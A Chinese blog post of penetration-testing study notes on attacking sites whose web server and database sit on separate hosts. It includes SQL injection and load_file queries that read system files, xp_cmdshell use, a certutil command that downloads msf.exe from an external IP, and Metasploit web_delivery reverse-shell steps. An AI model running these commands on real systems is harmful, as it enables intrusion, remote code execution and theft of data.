end的学习站库分离渗透思路

最新推荐文章于 2024-07-26 16:57:43 发布
最新推荐文章于 2024-07-26 16:57:43 发布
阅读量2k 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/109751200
版权

0X00 站库分离

站库分离其实就是管理员将网站程序和数据库分别放在了不同的内网服务器上。

0X01站库分离渗透入口

(1) Web入口渗透

通过网站的各种漏洞来Getshell,如:文件上传、文件包含、命令执行、代码执行、SQL注入写入一句话(Into outfile、日志备份)等,在获得Webshell权限或者有诸如文件读取等漏洞时,我们可以读数据库配置文件、对数据库内容分析、查找数据库备份,进而对内网数据库服务器进行渗透。

(2) Data入口渗透

从数据库入口渗透同样是为了获取更大的权限,或者扩展我们的渗透成果。比如从这台数据库服务器中可以得到网站和数据库的一些用户、密码等信息,在后续的内网渗透中可以很有效的帮助我们。

通过外网暴露的数据库弱口令、反编译或嗅探C/S客户端以及Web网站SQL注入漏洞等,在获得数据库账户密码或者利用sqlmap进入到os-shell、sql-shell,这时我们不能写入Webshel,因为这台数据库服务器中没有Web环境,但可以通过以下方式来做信息搜集和获取权限,先拿到这台数据库服务器权限,然后再尝试对Web服务器和内网其他主机进行渗透。

0x02库站分离判断

(1) 网络连接状态

通过Netstat命令查看MSSQL数据库1433端口的网络连接状态。
例如:看到与当前MSSQL数据库服务器192.168.32.8建立连接的只有192.168.32.3,由此可以判断这台主机为Web服务器。
(1433端口,是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434)

netstat -ano | findstr "1433"

(2) 数据库配置文件

通过网站程序数据库配置文件来判断是否站库分离,如果数据库IP地址是localhost、127.0.0.1或当前主机内网IP则说明为同服务器,反之则可能为站库分离,自建公网数据库和RDS云数据库除外。

(3) MySQL内置函数和库

通过MySQL的@@hostname内置函数可以查看服务端主机名称,information_schema内置库的PROCESSLIST可以定位到当前已连接数据库的用户名、主机和端口号等信息,Windows连接格式:主机名:Port,Linux连接格式:IP:Port,本地连接格式:localhost:Port。

select @@hostname;                                 //服务端主机名称
select * from information_schema.PROCESSLIST;      //客户端主机名称和端口

在得到了 web 端的 ip 我们可以进而对 web 端进行渗透。

load_file () 获取数据库所在服务器的敏感信息

如果没有 secure_file_priv 参数的限制(MySQL5.7 以下)我们还可以用 load_file() 函数对文件内容进行读取。

Load_file函数的功能是读取文件并返回文件内容为字符串。
要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。
该文件所有字节可读,但文件内容必须小于max_allowed_packet。

select load_file('C:/Windows/System32/drivers/etc/hosts');//hosts文件中解析的一些内网业务的IP地址和域名
/etc/udev/rules.d/70-persistent-net.rules          //获取网卡名称
/etc/network/interfaces                            //DHCP或静态IP
/var/lib/dhclient/dhclient--网卡.lease             //DHCP
/etc/sysconfig/network-scripts/ifcfg-网卡          //静态IP
IIS/Apache/Nginx/Tomcat/Jboss/Weblogic/Websphere的相关配置文件以及网卡信息

(4) MSSQL内置函数和表

通过MSSQL的host_name()、@@servername和serverproperty几个内置函数来判断是否站库分离,如果客户端与服务端返回的主机名不一样则说明为站库分离,返回的主机名一样则说明可能为同服务器。

select host_name();                       //客户端主机名称  ---HOST_NAME()函数返回服务器端计算机的名称
select @@servername;                      //服务端主机名称 ---@@servername:返回运行Sql server的本地服务器名称
select serverproperty('MachineName');     //服务端主机名称

也可以通过MSSQL的sysprocesses系统表来判断是否站库分离,它的功能类似于MySQL中的PROCESSLIST,可以定位到当前已连接到sqlinject数据库的用户名和主机名等信息。

processlist命令的输出结果显示了有哪些线程在运行,可以帮助识别出有问题的查询语句,两种方式使用这个命令。如果有SUPER权限,则可以看到全部的线程,否则,只能看到自己发起的线程(这是指,当前对应的MySQL帐户运行的线程)。

有时会有内网多台Web服务器同时连接一台数据库服务器中的不同数据库,这时我们就可以利用这种方式来查看连接到某数据库的用户名和主机名等信息,然后使用Ping主机名得到这台Web服务器的内网IP地址。

select name from master.sys.sysdatabases;
select * from master.sys.sysprocesses where dbid= db_id('sqlinject');
exec master..xp_cmdshell 'cmd /c ping WIN-111111111';

MSSQL注入语句来判断是否站库分离,news必须为数据库中存在的表名,当然用其他存在的表名也是可以的,如果注入页面返回不正常则说明为站库分离,反之则为同服务器。

and exists(select * from news where 1=(SELECT (case when host_name()=@@servername then 1 else 0 end)))

0x03站库分离利用

目标主机允许通外网时
(1) 下载远程文件
Vbs/Ftp/IPC$/Certutil/Bitsadmin/Powershell等方式来下载远程文件到可读写目录中,然后再去执行一下即可。(没看懂。。。。。)

certutil -urlcache -split -f http://155.**.***.229:8888/msf.exe C:\ProgramData\msf.exe

(2) 执行远程Payload
直接利用exploit/multi/script/web_delivery和exploit/windows/misc/hta_server两个模块来执行远程Payload获取会话。(这个也不懂。。。)

exploit/multi/script/web_delivery:让目标设备从远端服务器加载webshell代码至内存执行。------默认情况下目标设备来调取的时候其实是将webshell在远端服务器执行,并不是将文件加载至自己内存执行
使用msf中exploit的web_delivery模块。此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行

1use exploit/multi/script/web_delivery

2、set target PHP   ====>因为一般web平台默认支持PHP,所以我们选择兼容性最好的PHP做webshell

3、set payload php/meterpreter/reverse_tcp    ====>选择php写的meterpreter

4、set lhost 172.20.163.160

5、set lport 1111

6、run

exploit/windows/misc/hta_server借鉴:

http://cache.baiducontent.com/c?m=h-s5dJVaCeHB2x7Io9Y2mc-FDNxw5D7NMEWDl0cULXlNW3zvV4Jlbg5gZyisDrmfAth6phRDFZU15D1KfvU_8ZuzMdHvUYoUFrCFGJ9orRCLWIMbKP4wqfb0Fa3FFVuZy9LwFNF3Tts0MM_EvG9U82XUCFyd9t8UXIcc4sdKxNS&p=8b2a9715d9c643f613f18e364a55&newp=8b2a9702819211a05def87605f5292695d0fc20e3ad1da01298ffe0cc4241a1a1a3aecbf2d29160fd3c57d6401ab4c5cebf632703d0034f1f689df08d2ecce7e68df76&s=cfcd208495d565ef&user=baidu&fm=sc&query=exploit/windows/misc/hta%5Fserver&qid=abfc90d5001031de&p1=7

(3) 模拟令牌权限提升
主机在使用Windows身份验证连接到这台数据库服务器的MSSQL时就会保留当前登录用户的令牌,而大多数人又都是以默认Administrator管理员来安装的MSSQL,所以能够直接获取到Administrator令牌。(支持Windows身份验证的数据库连接工具有:sqlcmd、SSMS和Navicat Premium等。)

C:\Program Files\Microsoft SQL Server\100\Tools\Binn>sqlcmd.exe -S "192.168.1.109" -E
闲人end
关注
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 282
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
渗透题5
白帽子九一
09-18 2928
1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说… 2.mysql的网站注入,5.0以上和5.0以下有什么区别? 5.0以下没有information_schema这个系统表,无法列表名等,只能暴力跑表名。 5.0以下是多用户单操作,5.0以上是多用户多操做。 3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值? 丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台。
山石网科面经(附参考回答)
99度灰的博客
04-17 4244
吾有一友… base地:福州 职位:驻场安服工程师 走在上班路上,突然就接到了面试官的电面。过程二十几分钟,没有事先约好时间,面试官没提,没自我介绍就直接开始了。大概问的内容如下: 1.xss、ssrf漏洞利用,xxe、反序列化漏洞原理和利用 xss漏洞大概说了一下 cookie劫持、键盘记录器、模拟登录、点击劫持、获取浏览器或插件版本信息进一步利用,ssrf就说了主机探测、端口扫描,xxe和反序列化平时遇到的少,没回答好。 参考回答:xss漏洞利用:网络钓鱼,盗取账号密码、cookie劫持、刷流量,SEO
从零开始学习网络安全渗透测试之基础入门篇——(一)Web应用&架构搭建&站库分离&配置受限&DNS解析
最新发布
love6a6的博客
07-26 978
Web应用,全称Web应用程序(Web Application),指的是通过Web浏览器进行访问和使用的应用软件。它们通常基于Web技术,如HTML、CSS和JavaScript,运行在服务器上,用户可以通过网络(例如互联网)使用各种设备(如个人电脑、平板电脑、智能手机等)访问这些应用。
RedHat7.4 Yum环境下搭建LAMP实现库站分离(部署wordpress博客)
栗砸
01-28 616
目录什么是LAMP?优点实验准备(在VMware中进行)主机A:一、关闭防火墙及Selinux二、更换成阿里云yum源三、安装Apache四、安装PHP主机B:一、关闭防火墙及Selinux二、更换成阿里云yum源三、安装MySQL三、实现php连接mysql部署wordpress博客一、下载安装包二、安装博客 什么是LAMP? LAMP 架构是目前成熟的企业网站应用模式之一,能够提供动态 Web 站点服务及其应用开发环境 具体包括: Linux 操作系统 Apache 网站服务器 MySQL
关于站库分离渗透思路总结
Vdieoo的博客
11-05 3820
0x00 前言 看到了某篇关于站库分离类型站点相关的讨论,想总结下信息收集的技巧。 0x01 正文 关于站库分离类型站点网上暂时没有找到总结性的文章,所以想尝试记录下关于站库分离类型站点的渗透思路。 对站库分离类型站点通常可以有两个渗透入口点。 web 网站 数据库 渗透思路其实也是比较常规。但是这里如果两个入口点无非两种路径。 从 web 网站打入进而打站库分离的数据库,内网渗透 从数据库打入进而打站库分离的 web 网站,内网渗透 根据不同的路径定制不同的渗透测试方案,下面记录一下流程和
站库分离
CC's Blog
12-12 2813
1.web,sql分离(sql上网),sa. 读系统用户密码或加用户反弹,种反弹型后门. 2.web,sql分离(sql不上网),sa. 把和防火墙和策略有关的服务或进程kill掉再测试是否上网 收集尽量多的密码表.sqlsniffer findpass gethashs ipc$猜web密码 vbs读系统日志查看管理员登陆IP 有可能的话导出注册表的secpol查看策略规则. 3.web,s
记一次站库分离的sql注入题目(手注和sql-shell的使用)
qq_62078839的博客
05-03 2263
这里进行模糊测试,发现过滤了一大堆符号,但发现id为1和0时login name不同 考虑异或的sql盲注 附上我的脚本 import requests flag = "" for i in range(1, 2000): low = 32 high = 128 mid = (low + high) // 2 while low < high: url="http://*********/SQL%20Injection/?id=1^(..
使用阿里云搭建网站并实现站库分离
zeruns
04-19 1330
使用阿里云搭建自己的网站并用阿里云RDS实现站库分离,本文章将从注册域名到部署网站详细地讲解。 原文:https://blog.zeruns.tech/archives/513.html 什么是站库分离站库分离就是网站和数据库不在同一个服务器上,数据库用的是内网网络;这样的操作模式更快,更安全;很多大型的企业都采用站库分离的模式。 推荐几个网站程序,自己根据需要选择: 论坛:DiscuzX 博客...
渗透」:SQL注入新姿势:)
binaxin的博客
10-05 1525
由于一些机缘巧合,发现了一些SQL注入的新姿势,记录一下; 算是SQL注入的一种,叫wsdl注入,刚开始遇到比较新鲜,遂记录之。文笔不佳,包括注入理解都较为浅薄,各位大佬、师傅们见笑。 记录就是一个简单的练手记录,感觉非常有意思; 目标确定 在shodan、fofa上搜asmx,找到疑似存在wsdl注入的站(未授权),大概的是这样的:http://vuln_ip:8081/WebService1.asmx?WSDL,一般我们可以通过手工的方式去尝试注入,这样的站访问进去后是类似xml的文件,里面是各.
CSRF - 前后端分离后带来的新问题
Yuchen 的博客
10-07 3369
CSRF 的传统修复方式 几天前,在阅读一篇极为专业的渗透测试报告时,发现了安全人员汇报了一个严重又常见的问题:CSRF 跨站请求伪造,诚然由于开发者的疏忽,产生 CSRF 的问题的确比较严重,好在发现的早我们可以尽早修复。安全人员是这样建议的: The application should implement anti-CSRF tokens into all requests that pe...
On Adaptive Attacks to Adversarial Example Defenses
Sujq0326的博客
11-06 330
文章目录On Adaptive Attacks to Adversarial Example Defenses对于对抗性样本防御的自适应性攻击阅读答疑笔记1. 量化2. 投票法和加权投票法3. Decision-based boundary attack (DBB)内容1. abstract2. introduction3. background4. Methodology5. Recurring Attack Themes6. Our Adaptive Evaluations(1)k-Winners Ta
简单实现LAMP站库分离部署
RixHuang的博客
12-21 579
其实很简单,就是将MySQL部署在另一台虚拟机或者服务器上,我前面有写怎么部署LAMP和LNMP的博客,可以去点击观看。 这里新开一个博客是因为我打算使用CentOS7自带的PHP直接部署,记录一下简单操作: 一:在A虚拟机安装MySQL,并设置远程连接,开放3306端口; 二:在B虚拟机安装Apache; 三:安装PHP语言支持库: yum -y install php mysql ...
MSSQL站库分离注入绕过WDF提权
潇湘信安的博客
05-09 711
项目中遇到这样一个场景:MSSQL后台登录框注入,支持xp_cmdshell组件,站库分离(可出网),普通权限nt service\mssqlserver,但存在Defender杀软,暂时没法上线和提权。
站库分离技术--反向代理技术-雷池云WAF-给自己搭建一个安全点的网站
书山有路勤为径,学海无涯苦作舟
03-06 1814
Ubuntu 系统的默认用户名是 ubuntu,并在安装过程中默认不设置 root 账户和密码。您如有需要,可在设置中开启允许 root 用户登录。docker链接本地的数据库主机用host.docker.internal。用docker下载的mysql则用数据库ip进行连接。wordpress网站后台这里设置不带端口。#进入mysql数据库–123456。#设置mysql允许访问。以后记得备份这两个目录哟。
站库分离mysql提权_站库分离拿内网服务器到拿下目标服务器
weixin_28979345的博客
02-01 543
0x00提权环境这是一机油来问我如何脱裤~~~然后就试试提权看了下端口,就开了80和3389Windows2003 x86既然脱裤,就可想而知肯定有数据库由图可知该例是站库分离,当时我还傻乎乎的拿着sa去执行添加用户命令结果连不上~~~肯定连不上撒!!!好吧,思路有以下几条:一、不管这配置文件,直接在原服务器上进行提权二、先利用sa拿下内网...
站库分离技术--反向代理技术-雷池云WAF-给自己搭建一个安全点的网站_雷池waf启用proxy protocol
weixin_58085973的博客
04-12 405
Ubuntu 系统的默认用户名是 ubuntu,并在安装过程中默认不设置 root 账户和密码。您如有需要,可在设置中开启允许 root 用户登录。具体操作步骤如下:但是我感觉现在像上面这样配置数据库不安全,下面我重新配置一下mysql密码和用户我遇到2个问题,为什么呢? 原因:[nginx中proxy_set_header Hosthost的作用及host的作用及host的作用及proxy_host,host与host与host与http_host的区别]( )最后就可以再服务器的安全策略组关闭一些不能开
站库分离技术--反向代理技术-雷池云WAF-给自己搭建一个安全点的网站_雷池waf启用proxy protocol(1)
weixin_58085973的博客
04-12 501
Python编程学习学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值